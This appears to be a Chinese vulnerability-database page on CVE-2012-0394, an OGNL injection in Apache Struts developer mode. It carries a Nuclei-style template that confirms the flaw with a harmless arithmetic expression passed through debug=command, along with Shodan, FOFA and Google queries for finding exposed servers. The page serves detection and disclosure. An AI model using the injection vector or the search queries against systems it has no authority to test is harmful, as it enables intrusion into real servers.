CVE-2012-0394: Apache Struts <2.3.1.1 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Apache Struts | POC: 已公开

漏洞描述

Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."

PoC代码[已公开]

id: CVE-2012-0394

info:
  name: Apache Struts <2.3.1.1 - Remote Code Execution
  author: tess
  severity: medium
  description: |
    Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected server.
  remediation: |
    Upgrade Apache Struts to a version higher than 2.3.1.1 or apply the necessary patches.
  reference:
    - https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/
    - https://www.exploit-db.com/exploits/31434
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
    - http://www.exploit-db.com/exploits/18329
    - https://nvd.nist.gov/vuln/detail/CVE-2012-0394
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2012-0394
    cwe-id: CWE-94
    epss-score: 0.93567
    epss-percentile: 0.9983
    cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: struts
    shodan-query:
      - html:"Struts Problem Report"
      - http.title:"struts2 showcase"
      - http.html:"struts problem report"
      - http.html:"apache struts"
    fofa-query:
      - body="struts problem report"
      - title="struts2 showcase"
      - body="apache struts"
    google-query: intitle:"struts2 showcase"
  tags: cve,cve2012,ognl,injection,edb,apache,struts
variables:
  first: "{{rand_int(1000, 9999)}}"
  second: "{{rand_int(1000, 9999)}}"
  result: "{{to_number(first)*to_number(second)}}"

http:
  - method: GET
    path:
      - '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{{result}}'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a89e994cfd72dcd75293280c2cd1b3b701f30954a77919387603bb18058d5bb7022100f7756a0bd52e113766c28a3b2a6ac2c5f70faee9a1b15e368c9191ea91297803:922c64590222798bb761d5b6d8e72950

相关漏洞推荐